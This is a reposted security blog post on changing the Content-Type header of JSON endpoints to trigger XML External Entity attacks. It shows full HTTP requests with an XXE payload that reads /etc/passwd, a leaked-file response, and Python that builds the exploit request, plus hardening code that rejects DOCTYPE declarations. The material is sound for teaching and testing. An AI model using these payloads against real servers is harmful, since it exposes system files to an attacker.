
[Repost] Playing with Content-Type – XXE on JSON Endpoints


Many web and mobile applications rely on web services for client-server interaction. The most common data formats for web services are XML, whether SOAP or RESTful, and JSON. While a web service may be programmed to use just one of them, the server may still accept data formats that the developers did not anticipate. This can leave JSON endpoints vulnerable to XML External Entity (XXE) attacks, which exploit weakly configured XML parser settings on the server.

XXE is a well-known attack against XML endpoints. To exploit it, external entity declarations are included in the XML payload, and the server expands the entities, potentially resulting in read access to the web server’s file system, remote file system access via UNC paths, or connections to arbitrary hosts over HTTP/HTTPS. XXE attacks rely on inline DOCTYPE definitions in the XML payload. In the following example, an external entity pointing to the /etc/passwd file on the web server is declared and the entity is included in the XML payload:

<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
[some xml content..]
<element>&xxe;</element>
[some xml content..]

It’s a simple and neat attack. Time to play with the Content-Type header and HTTP request payloads to see whether it can be exploited against JSON endpoints as well. A sample JSON request is listed below, with the Content-Type set to application/json (with silly sample data and most HTTP headers removed):

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}

If the Content-Type header is changed to application/xml instead, the client is telling the server that the POST payload is XML formatted data. But if it isn’t, the server will not be able to parse it and may display an error similar to the following:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 127

{"errors":{"errorMessage":"org.xml.sax.SAXParseException: XML document structures must start and end within the same entity."}}

The error indicates that the server is able to process XML formatted data as well as JSON formatted data, but because the data wasn’t actually XML formatted as the Content-Type header claimed, it could not be parsed. To overcome this, the JSON has to be converted to XML. There are multiple online tools for that, and Eric Gruber created a Burp plugin (Content-Type Converter) to automate the conversion in Burp.

Original JSON

{"search":"name","value":"netspitest"}

XML Conversion

<?xml version="1.0" encoding="UTF-8" ?>
<search>name</search>
<value>netspitest</value>

However, this straight conversion results in an invalid XML document, as it lacks the single root element that a well-formed XML document requires. If the invalid XML is sent to the server, the server will sometimes respond with an error message stating what kind of root element was expected, along with its namespace. Otherwise the best guess is to add a root element <root>, which makes the XML well-formed:

<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>

Now the original JSON request can be sent as XML and the server may return a valid response:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 112

<?xml version="1.0" encoding="UTF-8" ?>
<root>
<search>name</search>
<value>netspitest</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}

As the server accepts XML input, XXE can be exploited against the JSON endpoint by adding an inline DOCTYPE to the converted payload and referencing the external entity in one of the values:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 2467

{"error": "no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
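The conversion, root-element wrapping and DOCTYPE injection steps above, as one added Python example (this is not code from the original post or from the Content-Type Converter plugin). It goes a little beyond the flat sample by handling nested objects and arrays; the helper names, the array convention (one element per item, repeating the key) and the sample JSON are assumptions for illustration:

```python
import json
from xml.sax.saxutils import escape

# Constructed sample input: the JSON body from the request shown above.
SAMPLE_JSON = '{"search":"name","value":"netspitest"}'


def _to_xml_fragments(value, tag):
    """Render one JSON value as XML elements named `tag` (recursive).

    Objects become nested elements, arrays repeat the enclosing tag once per
    item (an assumed convention; converters differ here), scalars become text.
    """
    if isinstance(value, dict):
        inner = "".join(_to_xml_fragments(v, k) for k, v in value.items())
        return f"<{tag}>{inner}</{tag}>"
    if isinstance(value, list):
        return "".join(_to_xml_fragments(item, tag) for item in value)
    if value is None:
        return f"<{tag}/>"
    if isinstance(value, bool):  # must precede the generic case: bool is an int
        return f"<{tag}>{'true' if value else 'false'}</{tag}>"
    # Escape &, < and > so string values cannot break the generated markup.
    return f"<{tag}>{escape(str(value))}</{tag}>"


def json_to_xml(json_text, root="root"):
    """Convert a JSON document to well-formed XML.

    A top-level JSON object has no natural root element, so one is wrapped
    around its members; <root> is the guess the post suggests when the server
    does not name the element it expects.
    """
    data = json.loads(json_text)
    if isinstance(data, dict):
        body = "".join(_to_xml_fragments(v, k) for k, v in data.items())
    else:
        body = _to_xml_fragments(data, "item")
    return '<?xml version="1.0" encoding="UTF-8" ?>\n' + f"<{root}>{body}</{root}>"


def inject_xxe(xml_doc, target_tag, system_id="file:///etc/passwd", entity="xxe"):
    """Declare an external entity and reference it inside `target_tag`.

    The DOCTYPE has to sit between the XML declaration and the root element;
    the text of the first <target_tag> element is replaced by &entity;.
    """
    decl, _, rest = xml_doc.partition("\n")
    doctype = f'<!DOCTYPE netspi [<!ENTITY {entity} SYSTEM "{system_id}" >]>'
    open_tag, close_tag = f"<{target_tag}>", f"</{target_tag}>"
    start = rest.find(open_tag)
    if start < 0:
        raise ValueError(f"no <{target_tag}> element in document")
    end = rest.find(close_tag, start)
    rest = rest[:start] + open_tag + f"&{entity};" + rest[end:]
    return f"{decl}\n{doctype}\n{rest}"


def build_request(host, path, body, content_type="application/xml"):
    """Assemble the raw HTTP/1.1 POST with a Content-Length matching the body."""
    raw = body.encode("utf-8")
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nAccept: application/json\r\n"
            f"Content-Type: {content_type}\r\nContent-Length: {len(raw)}\r\n\r\n")
    return head.encode("ascii") + raw


if __name__ == "__main__":
    payload = inject_xxe(json_to_xml(SAMPLE_JSON), "value")
    print(build_request("someserver.netspi.com", "/netspi", payload).decode())
```

The Content-Length is recomputed from the final body because the DOCTYPE and entity reference change its size; a stale length is the most common reason a hand-edited XXE request is rejected before the parser ever sees it.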

Obviously, not every JSON endpoint accepts XML; changing the Content-Type header may have no effect, or it may result in a 415 Unsupported Media Type error. On the other hand, JSON-to-XML attacks are not limited to POST bodies with JSON content. I have seen this work on JSON formatted GET and POST parameters as well: if the JSON parameter is converted and sent as XML, the server guesses the content type from the data itself.

So, to harden a JSON endpoint, XML parsing should be disabled altogether; where XML input must be accepted, inline DOCTYPE declarations should be disabled so that external entities can never be declared or expanded.
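The two hardening options above, as an added server-side example (not code from the original post, and in Python with the standard library's expat parser rather than the Java/SAX stack the error message on this page points to). `handle_request` and its status codes model a hypothetical endpoint; the request bodies are those shown earlier on the page:

```python
import json
import xml.parsers.expat

# Bodies from the requests shown above, reused as constructed test inputs.
PLAIN_XML = ('<?xml version="1.0" encoding="UTF-8" ?>\n<root>\n'
             '<search>name</search>\n<value>netspitest</value>\n</root>')
XXE_PAYLOAD = ('<?xml version="1.0" encoding="UTF-8" ?>\n'
               '<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
               '<root>\n<search>name</search>\n<value>&xxe;</value>\n</root>')


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries an inline DTD."""


def parse_xml_without_dtd(data):
    """Parse XML with expat, refusing any DOCTYPE or entity declaration.

    Returns a flat {tag: text} dict of the root element's direct children,
    which is all the sample endpoint needs. Failing on the DOCTYPE itself
    means an external entity can never be declared, let alone expanded.
    """
    parser = xml.parsers.expat.ParserCreate()
    result, stack, text = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed")

    def on_entity_decl(*args):
        raise DoctypeRejected("entity declarations not allowed")

    def on_start(tag, attrs):
        stack.append(tag)
        text.clear()

    def on_end(tag):
        if len(stack) == 2:  # closing a direct child of the root element
            result[tag] = "".join(text)
        stack.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = text.append
    parser.EndElementHandler = on_end
    parser.Parse(data, True)  # exceptions raised in handlers propagate here
    return result


def handle_request(content_type, body, allow_xml=False):
    """Model the endpoint's content negotiation; returns (status, result).

    allow_xml=False is the first option from the text: the body never reaches
    an XML parser and anything but JSON gets 415. allow_xml=True is the
    second: XML is parsed, but only without a DTD.
    """
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type == "application/json":
        try:
            return 200, json.loads(body)
        except ValueError:
            return 400, {"error": "malformed JSON"}
    if media_type in ("application/xml", "text/xml") and allow_xml:
        try:
            return 200, parse_xml_without_dtd(body)
        except DoctypeRejected as exc:
            return 400, {"error": str(exc)}
        except xml.parsers.expat.ExpatError as exc:
            return 400, {"error": f"malformed XML: {exc}"}
    return 415, {"error": f"unsupported media type {media_type!r}"}


if __name__ == "__main__":
    print(handle_request("application/xml", XXE_PAYLOAD))
    print(handle_request("application/xml", XXE_PAYLOAD, allow_xml=True))
    print(handle_request("application/xml", PLAIN_XML, allow_xml=True))
```

The dispatch is done on the declared media type only, never by sniffing the body, which is exactly the behaviour that made the JSON-in-a-GET-parameter variant above exploitable. For a Java/SAX parser the equivalent of the DOCTYPE handler is the `http://apache.org/xml/features/disallow-doctype-decl` feature set to true.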